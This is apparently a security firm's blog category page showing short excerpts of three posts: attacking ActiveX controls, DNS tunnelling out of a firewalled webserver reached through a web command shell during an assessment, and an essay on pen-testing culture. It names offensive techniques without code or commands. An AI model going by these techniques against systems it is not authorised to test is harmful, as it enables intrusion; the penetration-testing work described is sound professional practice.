Zen-Hacking
ActiveX Repurposing.. (aka: Other bugs your static analyzer will never find..) (aka 0day^H^H 485day bug!)
Earlier this week we had an internal presentation on Attacking ActiveX Controls. The main reason we had it is because of the ridiculously high hit rate we have whenever we look at controls with a slight security bent.. When building the presentation i dug up an old advisory we never publicly released (obviously we reported it to the vendor who (kinda) promptly fixed the bug (without giving us any credit…
DNS Tunnels (RE-REDUX)
On a recent assessment we came across the following scenario: 1) We have command execution through a web command interpreter script (cmd.jsp) on a remote Linux webserver 2) The box is firewalled only allowing 53 UDP ingress and egress 3) The box is sitting on the network perimeter, with one public IP and one internal IP, and not in a DMZ So we want to tunnel from the SensePost offices…
In Defense of Testing Pens… (aka how to keep your soul while being a pen-tester)
A short while back, a discussion broke out on a mailing list about the nature of being a pen-tester. The discussion quickly gravitated towards the number of “security” companies where numbers of projects far out-weigh the interestingness of projects, leading rapidly to a cookie-cutter mentality to pen-test engagements.. Of course if you have spent any time in the industry, you already know this to be true.. the obvious danger with…
Page 1 of 1